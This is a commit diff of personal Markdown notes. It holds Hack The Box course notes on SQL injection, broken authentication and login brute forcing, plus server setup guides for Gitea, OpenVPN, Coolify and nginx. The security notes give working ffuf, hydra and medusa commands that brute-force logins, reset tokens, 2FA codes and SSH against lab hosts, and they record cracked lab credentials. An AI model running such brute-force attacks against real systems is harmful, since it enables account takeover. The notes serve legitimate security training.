hammer/notes
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Migrate Markdown-Notes: projects, meetings, reference, personal

Browse Source
This commit is contained in:
Hammer
2026-01-26 22:05:01 +00:00
parent 9507ddf856
commit 49025b3586
93 changed files with 3422 additions and 11 deletions
Download Patch File Download Diff File Expand all files Collapse all files

7
reference/links.md Normal file
View File

@@ -0,0 +1,7 @@
# Reference
## Server Setup
- [ ] Sever setup
- [ ] [Setting up a production ready VPS is a lot easier than I thought](https://youtu.be/F-9KWQByeU0?si=C5OmUACsi_hFDeVU)
- [ ] [Server Setup Basics](https://becomesovran.com/blog/server-setup-basics.html?ref=dailydev#logs)

24
reference/security/HTB SQL Injection Fundamentals.md Normal file
View File

@@ -0,0 +1,24 @@
# HTB SQL Injection Fundamentals
## intro to mysql
djelly@htb[/htb]$ mysql -u root -h docker.hackthebox.eu -P 3306 --skip-ssl -p
mysql> CREATE DATABASE users;
or
mysql> SHOW DATABASES;
mysql> USE users;
mysql> CREATE TABLE logins (
-> id INT,
-> username VARCHAR(100),
-> password VARCHAR(100),
-> date_of_joining DATETIME
-> );
SHOW DATABASES;
mysql> SHOW TABLES;
mysql> DESCRIBE <table_name>;

5
reference/security/Password Attacks.md Normal file
View File

@@ -0,0 +1,5 @@
# Password Attacks
## John The Ripper
john --format=<hash_type> <hash or hash_file>

58
reference/security/htb_broken_ authentication.md Normal file
View File

@@ -0,0 +1,58 @@
# Broken Authentication
## Enumerating Users
ffuf -w /opt/useful/seclists/Usernames/xato-net-10-million-usernames.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown user"
94.237.59.119:54491
ffuf -w /opt/useful/seclists/Usernames/xato-net-10-million-usernames.txt -u http://94.237.59.119:54491/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown user"
## Brute-Forcing Passwords
grep '[[:upper:]]' /usr/share/wordlists/rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '.{10}' > custom_wordlist.txt
94.237.55.98:31173
ffuf -w ./custom_wordlist.txt -u http://94.237.55.98:31173/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=admin&password=FUZZ" -fr "Invalid username"
## Brute-Forcing Password Reset Token
seq -w 0 9999 > tokens.txt
ffuf -w ./tokens.txt -u http://94.237.60.154:47607/reset_password.php?token=FUZZ -fr "The provided token is invalid"
## Brute-Forcing 2fa codes
ffuf -w ./tokens.txt -u http://94.237.62.147:47987/2fa.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=gnpl9fatno1bhbegjdirvk70p4" -d "otp=FUZZ" -fr "Invalid 2FA Code
### Authentication Bypass via Parameter Modification
seq -w 0 999 > user_ids.txt
ffuf -w ./user_ids.txt -u http://94.237.51.81:46189/admin.php?user_id=FUZZ -fr "Could not load admin data"
75736572 3d 6874622d7374646e743b726f6c653d 75736572
75736572 3d 6874622d7374646e743b726f6c653d 75736572
### assessemtn
created user
test q97hjg2khvl28mucpu7r8h6kb8
admin q97hjg2khvl28mucpu7r8h6kb8
root q97hjg2khvl28mucpu7r8h6kb8
atleast 12 characters no special, atlease 1 number, lower, and upper
0123456789aB
ffuf -w ./xato-net-10-million-usernames.txt -u http://94.237.62.166:45749/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown username or password"
username is gladys
password is dWinaldasD13
ffuf -w tokens.txt -u http://94.237.63.109:42328/2fa.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=f782dbv49aq0fb6o0iutruripj" -d "otp=FUZZ" -fr "Invalid OTP"
Test0123456789

75
reference/security/htb_login_brute_forcing.md Normal file
View File

@@ -0,0 +1,75 @@
# HTB Login Brute Forcing
## Login Forms
### Hydra
hydra basic auth
hydra -l basic-auth-user -P 2023-200_most_used_passwords.txt 127.0.0.1 http-get / -s 81
can use hydra to crack passcodes in the login:
djelly@htb[/htb]$ hydra [options] target http-post-form "path:params:condition_string"
I can look for a fail condition like:
hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid credentials"
Or a success conditions:
- hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:S=302" # looking for a redirect
- hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:S=Dashboard" # looking for "Dashboard"
### Exercise
curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/top-usernames-shortlist.txt
curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/2023-200_most_used_passwords.txt
hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f {Replace with ip} -s {replace with port} http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"
hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f 83.136.251.254 -s 34996 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"
## Medusa
medusa -h 192.168.0.100 -U usernames.txt -P passwords.txt -M ssh
medusa -h <IP> -n <PORT> -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3
medusa -h 94.237.59.119 -n 39693 -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3
## Custom Wordlists
create likely usernames from a persons name:
git clone https://github.com/urbanadventurer/username-anarchy.git
./username-anarchy Jane Smith > jane_smith_usernames.txt
`cupp -i`
cupp in interactive mode will create lots of passwords from a persons life.
hydra -L usernames.txt -P jane-filtered.txt IP -s PORT -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"
:
hydra -L jane_smith_usernames.txt -P jane-filtered.txt 94.237.60.154 -s 46018 -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"
## Skill assessment1
:56383
hydra -L usernames.txt -P passwords.txt 94.237.50.94 http-get / -s 56383
[56383][http-get] host: 94.237.50.94 login: admin password: Admin123
## Skill assess2
83.136.250.158:39972
hydra -L usernames.txt -P passwords.txt -s 38376 -V 94.237.50.94 ftp
hydra -l satwossh -P passwords.txt -s 39972 -V 83.136.250.158 ssh -t 4
medusa -M ssh -h 83.136.250.158 -u root -P passwords.txt -n 39972 -t 4

65
reference/server-setup/Gitea Server.md Normal file
View File

@@ -0,0 +1,65 @@
# Gitea Server
- ChatGPT conversation: https://chatgpt.com/share/672ece16-da60-8009-83de-9b33c08aed6a
- follow the basic ubuntu setup first
### Install docker
https://docs.docker.com/engine/install/ubuntu/
### Docker compose
```
version: "3"
networks:
gitea:
external: false
services:
server:
image: gitea/gitea:latest
container_name: gitea
environment:
- USER_UID=1000
- USER_GID=1000
- GITEA__service__DISABLE_REGISTRATION=true
- GITEA__service__ENABLE_OPENID_SIGNIN=false
- GITEA__service__ENABLE_OPENID_SIGNUP=false
restart: always
networks:
- gitea
volumes:
- ./gitea:/data
- /etc/timezone:/etc/timezone:ro
- /etc/localtime:/etc/localtime:ro
ports:
- "3000:3000" # Gitea web interface
- "2222:22" # Gitea SSH
```
### Run docker compose
`docker-compose up -d`
`docker exec -it gitea /bin/bash`
`gitea admin user create --username admin --password YourPassword --email admin@example.com --admin`
### SQLITE DB
to get into the database
sqlite3 /data/gitea/gitea.db
for users, go to the user table
#### Delete a user
```
DELETE FROM user WHERE email = 'donovan.a.kelly@pm.me';
DELETE FROM email_address WHERE email = 'donovan.a.kelly@pm.me';
DELETE FROM external_login_user WHERE email = 'donovan.a.kelly@pm.me';
```

205
reference/server-setup/OpenVPN and CA install.md Normal file
View File

@@ -0,0 +1,205 @@
# OpenVPN and CA install
### sources
- https://www.digitalocean.com/community/tutorials/how-to-set-up-and-configure-an-openvpn-server-on-ubuntu-20-04
- https://chatgpt.com/share/672b8e75-5a08-8009-9d13-f062d91bfac8
### Prereqs
ubunutu 24 with ufw configured
### Update/Upgrade
```
sudo apt update
sudo apt upgrade -y
```
### Install OpenVPN and Easy-RSA
`sudo apt install openvpn easy-rsa -y`
### Setup CA
```
make-cadir ~/openvpn-ca
cd ~/openvpn-ca
```
```
vi vars
```
```
set_var EASYRSA_REQ_COUNTRY "YourCountry"
set_var EASYRSA_REQ_PROVINCE "YourProvince"
set_var EASYRSA_REQ_CITY "YourCity"
set_var EASYRSA_REQ_ORG "YourOrganization"
set_var EASYRSA_REQ_EMAIL "email@example.com"
set_var EASYRSA_REQ_OU "YourOrganizationalUnit"
```
```
./easyrsa init-pki
./easyrsa build-ca
```
add password to ca
### Generate Certs and Keys
`./easyrsa gen-req server nopass`
`./easyrsa sign-req server server`
Type yes and enter ca password
`./easyrsa gen-dh`
`openvpn --genkey --secret ta.key` // this is deperacated need update
### Config OpenVPN Server
`sudo cp pki/ca.crt pki/private/server.key pki/issued/server.crt pki/dh.pem ta.key /etc/openvpn/`
`sudo vi /etc/openvpn/server.conf`
```
port 1194
proto udp
dev tun
ca ca.crt
cert server.crt
key server.key # This file should be kept secret
dh dh.pem
tls-auth ta.key 0 # This file should be kept secret
cipher AES-256-CBC
auth SHA256
server 10.8.0.0 255.255.255.0
ifconfig-pool-persist ipp.txt
push "route {ip.addr.ess.0 last byte is masked} 255.255.255.0" # Replace with masked ip address
keepalive 10 120
persist-key
persist-tun
user nobody
group nogroup
status openvpn-status.log
verb 3
```
### Enable IP Forwarding
`sudo vi /etc/sysctl.conf`
```
net.ipv4.ip_forward=1
```
`sudo sysctl -p`
### Config Firewall
`sudo vi /etc/default/ufw`
change: `DEFAULT_FORWARD_POLICY="ACCEPT"`
`sudo vi /etc/ufw/before.rules`
Replace IP Address:
```
# START OPENVPN RULES
*nat
:POSTROUTING ACCEPT [0:0]
-A POSTROUTING -s 10.8.0.0/8 -o {ADD IP ADDRESS} -j MASQUERADE
COMMIT
# END OPENVPN RULES
```
`sudo ufw allow 1194/udp`
`sudo ufw enable`
### Start OpenVPN
```
sudo systemctl start openvpn@server
sudo systemctl enable openvpn@server
sudo systemctl status openvpn@server
```
### Client Config
```
mkdir -p ~/client-configs/keys
mkdir -p ~/client-configs/files
```
`vi ~/client-configs/base.conf`
Rplace MY IP ADDRESS
```
client
dev tun
proto udp
remote {MY IP ADDRESS} 1194
resolv-retry infinite
nobind
user nobody
group nogroup
persist-key
persist-tun
remote-cert-tls server
cipher AES-256-CBC
auth SHA256
key-direction 1
verb 3
```
### Client Certificates and Keys
`cd ~/openvpn-ca`
Replace client1 with client_name
```
./easyrsa gen-req client1 nopass
./easyrsa sign-req client client1
```
`cp pki/ca.crt pki/issued/client1.crt pki/private/client1.key ta.key ~/client-configs/keys/`
`vi ~/client-configs/make_config.sh`
### Generate Client Keys
Replace client name
```
#!/bin/bash
CLIENT_NAME={client name}
KEY_DIR=~/client-configs/keys
OUTPUT_DIR=~/client-configs/files
BASE_CONFIG=~/client-configs/base.conf
mkdir -p $OUTPUT_DIR
cat ${BASE_CONFIG} \
<(echo -e '<ca>') \
${KEY_DIR}/ca.crt \
<(echo -e '</ca>\n<cert>') \
${KEY_DIR}/${CLIENT_NAME}.crt \
<(echo -e '</cert>\n<key>') \
${KEY_DIR}/${CLIENT_NAME}.key \
<(echo -e '</key>\n<tls-auth>') \
${KEY_DIR}/ta.key \
<(echo -e '</tls-auth>') \
> ${OUTPUT_DIR}/${CLIENT_NAME}.ovpn
```
`chmod 700 ~/client-configs/make_config.sh`
`./client-configs/make_config.sh`
### Distribute Client Config
{client name}.ovpn is now available in ~/client-configs/files/.

75
reference/server-setup/hetzner_coolify_setup.md Normal file
View File

@@ -0,0 +1,75 @@
# Hetzner Coolify Setup
## Sources
- https://www.youtube.com/watch?v=taJlPG82Ucw&t=56s
## Hetzner dashboard setup
- add ssh key
- add this to cloud init
``` cloud_init.yml
# This config was written for Ubuntu 22.04
# If you are using a more recent version, see the comments of this gist for fixes
#cloud-config
users:
- name: dkelly
ssh_authorized_keys:
- "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKQWloxYNqNyOw6KKXsQnYPakthlq9gqf5qR1QGR1g6w donovan.a.kelly@pm.me"
sudo: ALL=(ALL:ALL) ALL
groups: sudo
shell: /bin/bash
chpasswd:
expire: true
users:
- name: dkelly
password: replacethispasswordplease
type: text
runcmd:
- sed -i '/PermitRootLogin/d' /etc/ssh/sshd_config
- echo "PermitRootLogin without-password" >> /etc/ssh/sshd_config
- sed -i '/PubkeyAuthentication/d' /etc/ssh/sshd_config
- echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
- sed -i '/PasswordAuthentication/d' /etc/ssh/sshd_config
- echo "PasswordAuthentication no" >> /etc/ssh/sshd_config
- systemctl restart sshd
- echo "\$nrconf{kernelhints} = -1;" > /etc/needrestart/conf.d/99disable-prompt.conf
- apt update
- apt upgrade -y --allow-downgrades --allow-remove-essential --allow-change-held-packages
- reboot
```
## Setup
- ssh into root
```
apt update
apt upgrade
reboot
```
- Don't mess with ufw or ssh config or worry about create a sudo user. Do this at the end
## Install Coolify
curl -fsSL https://cdn.coollabs.io/coolify/install.sh | bash
## Setup
- create username and password. we'll have to change this later because it doesn't use ssl
- select localhost
## Lock down the server
- ssh into dkelly user and change password
- Set the root password `passwd`
- setup ufw
## Add DNS Records
-add wildcard * and empty A records
## Proxy restart
- might need to restart the proxy for ssh keys to take effect

64
reference/server-setup/nginx on vpn.md Normal file
View File

@@ -0,0 +1,64 @@
# Nginx on VPN
Configure server with OpenVPN and CA
### Install OpenVPN
`sudo apt install nginx`
### nginx config
`sudo vi /etc/nginx/sites-av.../default`
```
server {
listen 10.8.0.1:443 ssl;
# server_name _; # You can omit this line or use '_'
ssl_certificate /etc/ssl/certs/nginx-selfsigned.crt;
ssl_certificate_key /etc/ssl/private/nginx-selfsigned.key;
# SSL settings
ssl_protocols TLSv1.2 TLSv1.3;
ssl_ciphers HIGH:!aNULL:!MD5;
ssl_prefer_server_ciphers on;
ssl_session_cache shared:SSL:10m;
ssl_session_timeout 10m;
ssl_session_tickets off;
# Add Diffie-Hellman parameter for DHE ciphersuites
ssl_dhparam /etc/ssl/certs/dhparam.pem;
# Add security headers
add_header Strict-Transport-Security "max-age=63072000; includeSubDomains; preload" always;
add_header X-Content-Type-Options nosniff;
add_header X-Frame-Options DENY;
add_header X-XSS-Protection "1; mode=block";
# Reverse proxy settings
location / {
proxy_pass http://<SERVER_B_IP>:80;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
}
}
```
### SSL Certs
```
sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout /etc/ssl/private/nginx-selfsigned.key \
-out /etc/ssl/certs/nginx-selfsigned.crt \
-subj "/CN=10.8.0.1"
```
`sudo openssl dhparam -out /etc/ssl/certs/dhparam.pem 2048`
```
sudo nginx -t
sudo systemctl reload nginx
```